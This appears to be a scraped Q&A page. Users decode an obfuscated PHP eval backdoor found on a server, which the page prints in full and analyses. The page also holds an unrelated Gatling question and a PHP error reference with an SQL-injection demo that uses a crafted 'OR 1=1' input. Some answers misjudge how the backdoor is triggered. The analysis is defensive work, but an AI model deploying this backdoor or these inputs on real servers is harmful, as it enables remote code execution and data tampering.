Suspicious file found on server - eval

I have found a suspicious file on my server and I am attempting to decode it and figure out what it was put there to do.
The code is as follows. Any tips on how to decode this?
<?php if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);} ?>
Thanks,
Alan.

The functions in php you're looking for appear to be a combination of base64_decode and urldecode. For example:
urldecode("\x6d\x79s\x74r\x31s\x311\x30");
gives "mystr1s110"
Also part of the string in the eval statement base64_decodes to:
function mystr1s78($mystr1s99){${"\x6d\x79s\x74r\x31s\x311\x30"}=mystr1s21::${"\x6dys\x74r1\x73178"};return ${"my\x73t\x72\x31s1\x310"}( mystr1s21::${${"\x6dy\x73tr\x31s9\x39"}} );}
Those encoded strings all reference variables defined earlier, for example \x6d\x79s\x74r\x31s\x311\x30 url-decodes to mystr1s110
This looks very nasty to me. Although I'm no security expert. I would just php -a and figure out what chunks are decoded how, then reconstruct the code from there.
On a side note. You pulled this off the server, right?
EDIT:
Was kind of intrigued by this. After a complete decode I got this:
<?php
if(!function_exists("myFunction2")){
class myClass {
static $myVar1="SFRUUF9IVFRQRA==";
static $myVar2="base64_decode";
}
function myFunction1($myArg)
{
${$myVar4}=myClass::$myVar2; // myClass::$myVar2 is just "base64_decode"
return $myVar4( myClass::${$myArg} ); // returning base64_decode of the argument
}
function myFunction2($myArg2)
{
return myClass::${$myVar3};
}
} // end of if(!function_exists("myFunction2"))
$myFinalVar=#getenv(myFunction1('myVar1')); //just gets env variable of base64 decode of myVar1
if($myFinalVar) {
#eval($myFinalVar); //executes
}
?>
Looks to me like it's a script designed to execute a script on another server (i.e. they could just hit the web address with their script in the URL and it would execute). SFRUUF9IVFRQRA== decodes to HTTP_HTTPD, so they could hit http://yourwebsite.com/thisscript.php?HTTP_HTTPD=myscriptaddress.php and it would run whatever they wanted on your server.
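The decoding steps in the answer above can be done statically, without running the sample in PHP. The following is an added example, not code from the question or the answers: it resolves PHP double-quoted escapes and peels `base64_decode` layers. The two class constants in `SAMPLE` are copied from the file in the question; the `eval` layer and all function names are constructed for the demonstration.

```python
import base64
import re

# PHP double-quoted escapes: \xH or \xHH, octal \ooo, single-character escapes.
_ESC = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3})|(.))", re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f",
           "e": "\x1b", "\\": "\\", "$": "$", '"': '"'}
_DQ_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
_B64_CALL = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)""")
_B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{8,}={0,2})\1""")

# Constructed sample in the style of the file from the question. The two
# static properties are the ones on the page; the eval payload is made up.
SAMPLE = r'''<?php class k { static $a="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $b="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }
eval("e\x76\x61l\x28b\x61se\x364_d\x65code\x28\x27JHg9Ilx4\x4emZceDZiIjs\x3d\x27\x29\x29\x3b"); ?>'''


def php_unescape(body):
    """Resolve the escapes PHP interprets inside a double-quoted string."""
    def repl(m):
        if m.group(1) is not None:            # \xHH: at most two hex digits
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:            # \ooo: octal, wraps at one byte
            return chr(int(m.group(2), 8) & 0xFF)
        ch = m.group(3)
        return _SIMPLE.get(ch, "\\" + ch)     # unknown escapes stay verbatim
    return _ESC.sub(repl, body)


def normalise(src):
    """Rewrite every double-quoted literal with its escapes resolved.

    The output is for reading, not for running: a resolved literal may
    itself contain quote characters.
    """
    return _DQ_LITERAL.sub(lambda m: '"' + php_unescape(m.group(1)) + '"', src)


def peel(src, max_depth=8):
    """Return the readable text of each layer, outermost first.

    Nothing is executed: base64_decode('...') calls with a literal argument
    are decoded in Python and queued as the next layer.
    """
    layers, queue = [], [(0, src)]
    while queue:
        depth, text = queue.pop(0)
        clear = normalise(text)
        layers.append(clear)
        if depth == max_depth:                # guard against decode loops
            continue
        for m in _B64_CALL.finditer(clear):
            try:
                inner = base64.b64decode(m.group(2), validate=True)
            except ValueError:                # not valid base64: skip it
                continue
            queue.append((depth + 1, inner.decode("latin-1")))
    return layers


def hidden_constants(clear):
    """Map quoted literals that are valid base64 of printable ASCII text.

    Catches values such as the static property that is only decoded at
    run time through a variable function name.
    """
    found = {}
    for m in _B64_LITERAL.finditer(clear):
        try:
            text = base64.b64decode(m.group(2), validate=True).decode("ascii")
        except ValueError:                    # bad padding or non-ASCII bytes
            continue
        if text.isprintable():
            found[m.group(2)] = text
    return found


if __name__ == "__main__":
    for i, layer in enumerate(peel(SAMPLE)):
        print(f"--- layer {i} ---\n{layer}")
    print(hidden_constants(peel(SAMPLE)[0]))
```

Run it on a copy of the file taken off the server; each printed layer is plain PHP that can be read without `eval` ever being called.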

According to me, it is not a harmful script, in fact, it is not of any use.
Here is the basis for my comments -
To decode, you can simply put the hex strings as argument to print_r().
print_r("b\x61\x73e\x364\x5fde\x63\x6fd\x65");
Complete decoded code is:
<?php
if(!function_exists("mystr1s45")){
class mystr1s21 {
static $mystr1s279="SFRUUF9IVFRQRA==";
static $mystr1s178="base64_decode";
}
eval(
eval(
function mystr1s78($mystr1s99){ // returns 'HTTP_HTTPD'
${mystr1s110}=mystr1s21::${mystr1s178};
return ${mystr1s110}( mystr1s21::${${mystr1s99}} );
}
);
eval(
function mystr1s45($mystr1s66) {
return mystr1s21::${${mystr1s66}};
}
);
);
}
$mystr1s2235=#getenv(mystr1s78("mystr1s279"));
if($mystr1s2235) {
#eval($mystr1s2235);
}
?>
The function mystr1s78 will return 'HTTP_HTTPD'. This will be used as an environment variable to get its value using getenv.
If you run the decoded code, you will face a 'Parsing Error' near the definition of function mystr1s78. This is because eval expects a string, and the string must be a valid code statement (not an expression).
Parse error: syntax error, unexpected 'mystr1s78' (T_STRING), expecting '('
As far as I know, by default, HTTP_HTTPD is not an environment variable which is set by apache or any webserver and even if it is a variable with some value, passing it to eval will not do anything.
To confirm, you can set an environment variable HTTP_HTTPD as follows:
<?php
apache_setenv('HTTP_HTTPD',<some_value>);
if(!function_exists("mystr1s45")){class mystr1s21 { static $mystr1s279="S\x46\x52U\x55F9\x49VFR\x51\x52A\x3d="; static $mystr1s178="b\x61\x73e\x364\x5fde\x63\x6fd\x65"; }eval("e\x76\x61\x6c\x28\x62a\x73e\x364\x5f\x64\x65c\x6f\x64\x65\x28\x27Zn\x56uY\x33Rpb\x324\x67bX\x6czd\x48\x49xcz\x634KC\x52teX\x4e\x30c\x6aF\x7aO\x54\x6bp\x65yR\x37I\x6cx\x34\x4emRc\x65D\x635c1\x78\x34NzR\x79X\x48gz\x4dXNc\x65DMx\x4dVx\x34Mz\x41if\x541t\x65XN\x30cj\x46zMj\x45\x36\x4fi\x52\x37\x49\x6cx\x34NmR\x35\x63\x31\x784Nz\x52y\x4dV\x78\x34\x4ez\x4d\x78Nzg\x69f\x54ty\x5aXR1\x63m4\x67J\x48sib\x58l\x63\x65\x44\x63zd\x46x4N\x7aJce\x44Mxc\x7aF\x63e\x44M\x78MCJ\x39K\x43\x42teX\x4e\x30\x63\x6aFzM\x6a\x456Oi\x527J\x48si\x58Hg\x32ZH\x6c\x63e\x44czd\x48J\x63\x65D\x4dxc\x7a\x6c\x63eDM\x35\x49\x6e19I\x43k\x37\x66Q\x3d\x3d\x27\x29\x29\x3be\x76a\x6c\x28\x62a\x73e\x364\x5f\x64e\x63o\x64\x65\x28\x27ZnV\x75Y3\x52pb\x324\x67b\x58\x6c\x7adHI\x78c\x7a\x51\x31KC\x52\x74eX\x4e0cj\x46zNj\x59\x70IH\x74y\x5aXR1\x63m\x34g\x62Xl\x7ad\x48I\x78czI\x78\x4fj\x6f\x6beyR\x37\x49m1\x35\x58Hg\x33\x4d3Rc\x65D\x63yMX\x4eceD\x4d2\x4e\x69\x4a9f\x54t\x39\x27\x29\x29\x3b");} $mystr1s2235=#getenv(mystr1s78("\x6dys\x74r1s\x3279"));if($mystr1s2235) {#eval($mystr1s2235);}
?>
Please let us know if you think this is malicious and can harm the system.

Related

Gatling .sign issue

I am trying to build a GET request as follows, and I would like the CaseReference value to be populated via the feeder .feed(CaseProviderSeq), but for some reason it's not picking up the CaseReference value and is printing the following for my println statement in the .sign statement below:
PATH KJ: /caseworkers/554355/jurisdictions/EMPLOYMENT/case-types/Manchester_Multiples/cases/$%7BCaseReference%7D/event-triggers/updateBulkAction_v2/token
My feeder CSV currently has the following rows:
1574761472170530
1574622770056940
so I am expecting this amended URL would be like
/caseworkers/554355/jurisdictions/EMPLOYMENT/case-types/Manchester_Multiples/cases/1574761472170530/event-triggers/updateBulkAction_v2/token
Any idea what I am doing wrong here?
.get(session => SaveEventUrl.replace(":case_reference","${CaseReference}").replaceAll("events", "") + s"event-triggers/${EventId}/token")
.header("ServiceAuthorization", s2sToken)
.header("Authorization", userToken)
.header("Content-Type","application/json")
.sign(new SignatureCalculator {
override def sign(request: Request): Unit = {
val path = request.getUri.getPath
println("PATH KJ: " + path)
request.getHeaders.add("uri", path)
}
})
This is not related to .sign, but your session attribute CaseReference not being interpreted. If you look closely you can see the braces %-encoded in $%7BCaseReference%7D.
Interpretation of the Gatling Expression Language strings happens only when a String is present when an Expression[Something] is needed [1].
This bug you wrote is shown exactly in the warning in the documentation above.
I believe you can simply remove session => in your .get, so you are passing in a String rather than a Session => String [2]. That string will be implicitly converted to Expression[String]. That way Gatling will put the session attribute into the URL.
[1] This happens because of the Scala implicit conversion.
[2] In fact it is Session => Validation[String], because, again, of implicit conversions.

Problems with BBCode Helper in cakephp [duplicate]

What is this?
This is a number of answers about warnings, errors, and notices you might encounter while programming PHP and have no clue how to fix them. This is also a Community Wiki, so everyone is invited to participate adding to and maintaining this list.
Why is this?
Questions like "Headers already sent" or "Calling a member of a non-object" pop up frequently on Stack Overflow. The root cause of those questions is always the same. So the answers to those questions typically repeat them and then show the OP which line to change in their particular case. These answers do not add any value to the site because they only apply to the OP's particular code. Other users having the same error cannot easily read the solution out of it because they are too localized. That is sad because once you understood the root cause, fixing the error is trivial. Hence, this list tries to explain the solution in a general way to apply.
What should I do here?
If your question has been marked as a duplicate of this one, please find your error message below and apply the fix to your code. The answers usually contain further links to investigate in case it shouldn't be clear from the general answer alone.
If you want to contribute, please add your "favorite" error message, warning or notice, one per answer, a short description what it means (even if it is only highlighting terms to their manual page), a possible solution or debugging approach and a listing of existing Q&A that are of value. Also, feel free to improve any existing answers.
The List
Nothing is seen. The page is empty and white. (also known as White Page/Screen Of Death)
Code doesn't run/what looks like parts of my PHP code are output
Warning: Cannot modify header information - headers already sent
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given a.k.a.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
Warning: [function] expects parameter 1 to be resource, boolean given
Warning: [function]: failed to open stream: [reason]
Warning: open_basedir restriction in effect
Warning: Division by zero
Warning: Illegal string offset 'XXX'
Warning: count(): Parameter must be an array or an object that implements Countable
Parse error: syntax error, unexpected '['
Parse error: syntax error, unexpected T_XXX
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE
Parse error: syntax error, unexpected T_PAAMAYIM_NEKUDOTAYIM
Parse error: syntax error, unexpected 'require_once' (T_REQUIRE_ONCE), expecting function (T_FUNCTION)
Parse error: syntax error, unexpected T_VARIABLE
Fatal error: Allowed memory size of XXX bytes exhausted (tried to allocate XXX bytes)
Fatal error: Maximum execution time of XX seconds exceeded
Fatal error: Call to a member function ... on a non-object or null
Fatal Error: Call to Undefined function XXX
Fatal Error: Cannot redeclare XXX
Fatal error: Can't use function return value in write context
Fatal error: Declaration of AAA::BBB() must be compatible with that of CCC::BBB()
Return type of AAA::BBB() should either be compatible with CCC::BBB(), or the #[\ReturnTypeWillChange] attribute should be used
Fatal error: Using $this when not in object context
Fatal error: Object of class Closure could not be converted to string
Fatal error: Undefined class constant
Fatal error: Uncaught TypeError: Argument #n must be of type x, y given
Notice: Array to string conversion (< PHP 8.0) or Warning: Array to string conversion (>= PHP 8.0)
Notice: Trying to get property of non-object error
Notice: Undefined variable or property
"Notice: Undefined Index", or "Warning: Undefined array key"
Notice: Undefined offset XXX [Reference]
Notice: Uninitialized string offset: XXX
Notice: Use of undefined constant XXX - assumed 'XXX' / Error: Undefined constant XXX
MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ... at line ...
Strict Standards: Non-static method [<class>::<method>] should not be called statically
Warning: function expects parameter X to be boolean/string/integer
HTTP Error 500 - Internal server error
Deprecated: Arrays and strings offset access syntax with curly braces is deprecated
Also, see:
Reference - What does this symbol mean in PHP?
Warning: Cannot modify header information - headers already sent
Happens when your script tries to send an HTTP header to the client but there already was output before, which resulted in headers to be already sent to the client.
This is an E_WARNING and it will not stop the script.
A typical example would be a template file like this:
<html>
<?php session_start(); ?>
<head><title>My Page</title>
</html>
...
The session_start() function will try to send headers with the session cookie to the client. But PHP already sent headers when it wrote the <html> element to the output stream. You'd have to move the session_start() to the top.
You can solve this by going through the lines before the code triggering the Warning and check where it outputs. Move any header sending code before that code.
An often overlooked output is new lines after PHP's closing ?>. It is considered a standard practice to omit ?> when it is the last thing in the file. Likewise, another common cause for this warning is when the opening <?php has an empty space, line, or invisible character before it, causing the web server to send the headers and the whitespace/newline, so that when PHP starts parsing it won't be able to submit any header.
If your file has more than one <?php ... ?> code block in it, you should not have any spaces in between them. (Note: You might have multiple blocks if you had code that was automatically constructed)
Also make sure you don't have any Byte Order Marks in your code, for example when the encoding of the script is UTF-8 with BOM.
Related Questions:
Headers already sent by PHP
All PHP "Headers already sent" Questions on Stackoverflow
Byte Order Mark
What PHP Functions Create Output?
Fatal error: Call to a member function ... on a non-object
Happens with code similar to xyz->method() where xyz is not an object and therefore that method can not be called.
This is a fatal error which will stop the script (forward compatibility notice: It will become a catchable error starting with PHP 7).
Most often this is a sign that the code has missing checks for error conditions. Validate that an object is actually an object before calling its methods.
A typical example would be
// ... some code using PDO
$statement = $pdo->prepare('invalid query', ...);
$statement->execute(...);
In the example above, the query cannot be prepared and prepare() will assign false to $statement. Trying to call the execute() method will then result in the Fatal Error because false is a "non-object" because the value is a boolean.
Figure out why your function returned a boolean instead of an object. For example, check the $pdo object for the last error that occurred. Details on how to debug this will depend on how errors are handled for the particular function/object/class in question.
If even the ->prepare is failing then your $pdo database handle object didn't get passed into the current scope. Find where it got defined. Then pass it as a parameter, store it as property, or share it via the global scope.
Another problem may be conditionally creating an object and then trying to call a method outside that conditional block. For example
if ($someCondition) {
$myObj = new MyObj();
}
// ...
$myObj->someMethod();
By attempting to execute the method outside the conditional block, your object may not be defined.
Related Questions:
Call to a member function on a non-object
List all PHP "Fatal error: Call to a member function ... on a non-object" Questions on Stackoverflow
Nothing is seen. The page is empty and white.
Also known as the White Page Of Death or White Screen Of Death. This happens when error reporting is turned off and a fatal error (often syntax error) occurred.
If you have error logging enabled, you will find the concrete error message in your error log. This will usually be in a file called "php_errors.log", either in a central location (e.g. /var/log/apache2 on many Linux environments) or in the directory of the script itself (sometimes used in a shared hosting environment).
Sometimes it might be more straightforward to temporarily enable the display of errors. The white page will then display the error message. Take care because these errors are visible to everybody visiting the website.
This can be easily done by adding at the top of the script the following PHP code:
ini_set('display_errors', 1); error_reporting(~0);
The code will turn on the display of errors and set reporting to the highest level.
Since the ini_set() is executed at runtime it has no effects on parsing/syntax errors. Those errors will appear in the log. If you want to display them in the output as well (e.g. in a browser) you have to set the display_startup_errors directive to true. Do this either in the php.ini or in a .htaccess or by any other method that affects the configuration before runtime.
You can use the same methods to set the log_errors and error_log directives to choose your own log file location.
Looking in the log or using the display, you will get a much better error message and the line of code where your script comes to halt.
Related questions:
PHP's white screen of death
White screen of death!
PHP Does Not Display Error Messages
PHP emitting 500 on errors - where is this documented?
How to get useful error messages in PHP?
All PHP "White Page of Death" Questions on Stackoverflow
Related errors:
Parse error: syntax error, unexpected T_XXX
Fatal error: Call to a member function ... on a non-object
Code doesn't run/what looks like parts of my PHP code are output
"Notice: Undefined Index", or "Warning: Undefined array key"
Happens when you try to access an array by a key that does not exist in the array.
A typical example of an Undefined Index notice would be (demo)
$data = array('foo' => '42', 'bar');
echo $data['spinach'];
echo $data[1];
Both spinach and 1 do not exist in the array, causing an E_NOTICE to be triggered. In PHP 8.0, this is an E_WARNING instead.
The solution is to make sure the index or offset exists prior to accessing that index. This may mean that you need to fix a bug in your program to ensure that those indexes do exist when you expect them to. Or it may mean that you need to test whether the indexes exist using array_key_exists or isset:
$data = array('foo' => '42', 'bar');
if (array_key_exists('spinach', $data)) {
echo $data['spinach'];
}
else {
echo 'No key spinach in the array';
}
If you have code like:
<?php echo $_POST['message']; ?>
<form method="post" action="">
<input type="text" name="message">
...
then $_POST['message'] will not be set when this page is first loaded and you will get the above error. Only when the form is submitted and this code is run a second time will the array index exist. You typically check for this with:
if ($_POST) .. // if the $_POST array is not empty
// or
if ($_SERVER['REQUEST_METHOD'] == 'POST') .. // page was requested with POST
Related Questions:
Reference: “Notice: Undefined variable” and “Notice: Undefined index”
All PHP "Notice: Undefined Index" Questions on Stackoverflow
http://php.net/arrays
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given
First and foremost:
Please, don't use mysql_* functions in new code. They are no longer maintained and are officially deprecated. See the red box? Learn about prepared statements instead, and use PDO or MySQLi - this article will help you decide which. If you choose PDO, here is a good tutorial.
This happens when you try to fetch data from the result of mysql_query but the query failed.
This is a warning and won't stop the script, but will make your program wrong.
You need to check the result returned by mysql_query by
$res = mysql_query($sql);
if (!$res) {
trigger_error(mysql_error(),E_USER_ERROR);
}
// after checking, do the fetch
Related Questions:
mysql_fetch_array() expects parameter 1 to be resource, boolean given in select
All "mysql_fetch_array() expects parameter 1 to be resource, boolean given" Questions on Stackoverflow
Related Errors:
Warning: [function] expects parameter 1 to be resource, boolean given
Other mysql* functions that also expect a MySQL result resource as a parameter will produce the same error for the same reason.
Fatal error: Using $this when not in object context
$this is a special variable in PHP which can not be assigned. If it is accessed in a context where it does not exist, this fatal error is given.
This error can occur:
If a non-static method is called statically. Example:
class Foo {
protected $var;
public function __construct($var) {
$this->var = $var;
}
public static function bar () {
// ^^^^^^
echo $this->var;
// ^^^^^
}
}
Foo::bar();
How to fix: review your code again, $this can only be used in an object context, and should never be used in a static method. Also, a static method should not access the non-static property. Use self::$static_property to access the static property.
If code from a class method has been copied over into a normal function or just the global scope and keeping the $this special variable.
How to fix: Review the code and replace $this with a different substitution variable.
Related Questions:
Call non-static method as static: PHP Fatal error: Using $this when not in object context
Copy over code: Fatal error: Using $this when not in object context
All "Using $this when not in object context" Questions on Stackoverflow
Fatal error: Call to undefined function XXX
Happens when you try to call a function that is not defined yet. Common causes include missing extensions and includes, conditional function declaration, function in a function declaration or simple typos.
Example 1 - Conditional Function Declaration
$someCondition = false;
if ($someCondition === true) {
function fn() {
return 1;
}
}
echo fn(); // triggers error
In this case, fn() will never be declared because $someCondition is not true.
Example 2 - Function in Function Declaration
function createFn()
{
function fn() {
return 1;
}
}
echo fn(); // triggers error
In this case, fn will only be declared once createFn() gets called. Note that subsequent calls to createFn() will trigger an error about Redeclaration of an Existing function.
You may also see this for a PHP built-in function. Try searching for the function in the official manual, and check what "extension" (PHP module) it belongs to, and what versions of PHP support it.
In case of a missing extension, install that extension and enable it in php.ini. Refer to the Installation Instructions in the PHP Manual for the extension your function appears in. You may also be able to enable or install the extension using your package manager (e.g. apt in Debian or Ubuntu, yum in Red Hat or CentOS), or a control panel in a shared hosting environment.
If the function was introduced in a newer version of PHP from what you are using, you may find links to alternative implementations in the manual or its comment section. If it has been removed from PHP, look for information about why, as it may no longer be necessary.
In case of missing includes, make sure to include the file declaring the function before calling the function.
In case of typos, fix the typo.
Related Questions:
https://stackoverflow.com/search?q=Fatal+error%3A+Call+to+undefined+function
Parse error: syntax error, unexpected T_XXX
Happens when you have T_XXX token in unexpected place, unbalanced (superfluous) parentheses, use of short tag without activating it in php.ini, and many more.
Related Questions:
Reference: PHP Parse/Syntax Errors; and How to solve them?
Parse Error: syntax error: unexpected '{'
Parse error: Syntax error, unexpected end of file in my PHP code
Parse error: syntax error, unexpected '<' in - Fix?
Parse error: syntax error, unexpected '?'
For further help see:
http://phpcodechecker.com/ - Which does provide some more helpful explanations on your syntax woes.
Fatal error: Can't use function return value in write context
This usually happens when using a function directly with empty.
Example:
if (empty(is_null(null))) {
echo 'empty';
}
This is because empty is a language construct and not a function, it cannot be called with an expression as its argument in PHP versions before 5.5. Prior to PHP 5.5, the argument to empty() must be a variable, but an arbitrary expression (such as a return value of a function) is permissible in PHP 5.5+.
empty, despite its name, does not actually check if a variable is "empty". Instead, it checks if a variable doesn't exist, or == false. Expressions (like is_null(null) in the example) will always be deemed to exist, so here empty is only checking if it is equal to false. You could replace empty() here with !, e.g. if (!is_null(null)), or explicitly compare to false, e.g. if (is_null(null) == false).
Related Questions:
Fatal error: Can't use function the return value
MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ... at line ...
This error is often caused because you forgot to properly escape the data passed to a MySQL query.
An example of what not to do (the "Bad Idea"):
$query = "UPDATE `posts` SET my_text='{$_POST['text']}' WHERE id={$_GET['id']}";
mysqli_query($db, $query);
This code could be included in a page with a form to submit, with an URL such as http://example.com/edit.php?id=10 (to edit the post n°10)
What will happen if the submitted text contains single quotes? $query will end up with:
$query = "UPDATE `posts` SET my_text='I'm a PHP newbie' WHERE id=10";
And when this query is sent to MySQL, it will complain that the syntax is wrong, because there is an extra single quote in the middle.
To avoid such errors, you MUST always escape the data before use in a query.
Escaping data before use in a SQL query is also very important because if you don't, your script will be open to SQL injections. An SQL injection may cause alteration, loss or modification of a record, a table or an entire database. This is a very serious security issue!
Documentation:
How can I prevent SQL injection in PHP?
mysql_real_escape_string()
mysqli_real_escape_string()
How does the SQL injection from the "Bobby Tables" XKCD comic work?
SQL injection that gets around mysql_real_escape_string()
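The broken query above next to a parameterised version, as an added example that is not part of the original answer. It uses Python's sqlite3 with an in-memory table in place of PHP and MySQL so that it runs stand-alone; the function names and the seeded rows are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the `posts` table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, my_text TEXT)")
    db.executemany("INSERT INTO posts VALUES (?, ?)",
                   [(10, "first post"), (11, "second post")])
    return db


def update_concat(db, text, post_id):
    """The 'Bad Idea': request data is pasted straight into the SQL text."""
    query = f"UPDATE posts SET my_text='{text}' WHERE id={post_id}"
    return db.execute(query).rowcount


def update_bound(db, text, post_id):
    """Placeholders: values are bound as data and never parsed as SQL."""
    cur = db.execute("UPDATE posts SET my_text=? WHERE id=?", (text, post_id))
    return cur.rowcount


def texts(db):
    """Current my_text of every row, ordered by id."""
    return [r[0] for r in db.execute("SELECT my_text FROM posts ORDER BY id")]


def demo():
    """Run the same two inputs through both versions and collect the outcome."""
    results = {}

    db = make_db()
    try:
        # The text from the answer: the apostrophe ends the SQL string early.
        update_concat(db, "I'm a PHP newbie", "10")
    except sqlite3.OperationalError as exc:
        results["quote_in_text"] = f"syntax error: {exc}"
    # An id that is not a plain number becomes part of the WHERE clause.
    results["crafted_id_rows"] = update_concat(db, "edited", "10 OR 1=1")
    results["after_concat"] = texts(db)

    db = make_db()
    results["bound_rows"] = update_bound(db, "I'm a PHP newbie", "10")
    results["bound_crafted_rows"] = update_bound(db, "edited", "10 OR 1=1")
    results["after_bound"] = texts(db)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In PHP the same separation of query text and values is what prepared statements in PDO or MySQLi provide.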
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE
In PHP 8.0 and above, the message is instead:
syntax error, unexpected string content "", expecting "-" or identifier or variable or number
This error is most often encountered when attempting to reference an array value with a quoted key for interpolation inside a double-quoted string when the entire complex variable construct is not enclosed in {}.
The error case:
This will result in Unexpected T_ENCAPSED_AND_WHITESPACE:
echo "This is a double-quoted string with a quoted array key in $array['key']";
//---------------------------------------------------------------------^^^^^
Possible fixes:
In a double-quoted string, PHP will permit array key strings to be used unquoted, and will not issue an E_NOTICE. So the above could be written as:
echo "This is a double-quoted string with an un-quoted array key in $array[key]";
//------------------------------------------------------------------------^^^^^
The entire complex array variable and key(s) can be enclosed in {}, in which case they should be quoted to avoid an E_NOTICE. The PHP documentation recommends this syntax for complex variables.
echo "This is a double-quoted string with a quoted array key in {$array['key']}";
//--------------------------------------------------------------^^^^^^^^^^^^^^^
// Or a complex array property of an object:
echo "This is a double-quoted string with a complex {$object->property->array['key']}";
Of course, the alternative to any of the above is to concatenate the array variable in instead of interpolating it:
echo "This is a double-quoted string with an array variable". $array['key'] . " concatenated inside.";
//----------------------------------------------------------^^^^^^^^^^^^^^^^^^^^^
For reference, see the section on Variable Parsing in the PHP Strings manual page
Fatal error: Allowed memory size of XXX bytes exhausted (tried to allocate XXX bytes)
There is not enough memory to run your script. PHP has reached the memory limit and stops executing it. This error is fatal, the script stops. The value of the memory limit can be configured either in the php.ini file or by using ini_set('memory_limit', '128M'); in the script (which will overwrite the value defined in php.ini). The purpose of the memory limit is to prevent a single PHP script from gobbling up all the available memory and bringing the whole web server down.
The first thing to do is to minimise the amount of memory your script needs. For instance, if you're reading a large file into a variable or are fetching many records from a database and are storing them all in an array, that may use a lot of memory. Change your code to instead read the file line by line or fetch database records one at a time without storing them all in memory. This does require a bit of a conceptual awareness of what's going on behind the scenes and when data is stored in memory vs. elsewhere.
If this error occurred when your script was not doing memory-intensive work, you need to check your code to see whether there is a memory leak. The memory_get_usage function is your friend.
Related Questions:
All "Fatal error: Allowed memory size of XXX bytes exhausted" Questions on Stackoverflow
Warning: [function]: failed to open stream: [reason]
It happens when you call a file, usually by include, require or fopen, and PHP couldn't find the file or does not have enough permission to load the file.
This can happen for a variety of reasons :
the file path is wrong
the file path is relative
include path is wrong
permissions are too restrictive
SELinux is in force
and many more ...
One common mistake is to not use an absolute path. This can be easily solved by using a full path or magic constants like __DIR__ or dirname(__FILE__):
include __DIR__ . '/inc/globals.inc.php';
or:
require dirname(__FILE__) . '/inc/globals.inc.php';
Ensuring the right path is used is one step in troubleshooting these issues, this can also be related to non-existing files, rights of the filesystem preventing access or open basedir restrictions by PHP itself.
The best way to solve this problem quickly is to follow the troubleshooting checklist below.
Related Questions:
Troubleshooting checklist: Failed to open stream
Related Errors:
Warning: open_basedir restriction in effect
Parse error: syntax error, unexpected T_PAAMAYIM_NEKUDOTAYIM
The scope resolution operator is also called "Paamayim Nekudotayim", from the Hebrew פעמיים נקודתיים, which means "double colon".
This error typically happens if you inadvertently put :: in your code.
Related Questions:
Reference: PHP Parse/Syntax Errors; and How to solve them?
What do two colons mean in PHP?
What's the difference between :: (double colon) and -> (arrow) in PHP?
Unexpected T_PAAMAYIM_NEKUDOTAYIM, expecting T_NS_Separator
Documentation:
Scope Resolution Operator (::)
Notice: Undefined variable
Happens when you try to use a variable that wasn't previously defined.
A typical example would be
foreach ($items as $item) {
// do something with item
$counter++;
}
If you didn't define $counter before, the code above will trigger the notice.
The correct way is to set the variable before using it
$counter = 0;
foreach ($items as $item) {
// do something with item
$counter++;
}
Similarly, a variable is not accessible outside its scope, for example when using anonymous functions.
$prefix = "Blueberry";
$food = ["cake", "cheese", "pie"];
$prefixedFood = array_map(function ($food) {
// Prefix is undefined
return "${prefix} ${food}";
}, $food);
This should instead be passed using use
$prefix = "Blueberry";
$food = ["cake", "cheese", "pie"];
$prefixedFood = array_map(function ($food) use ($prefix) {
    return "${prefix} ${food}";
}, $food);
Notice: Undefined property
This error means much the same thing, but refers to a property of an object. Reusing the example above, this code would trigger the error because the counter property hasn't been set.
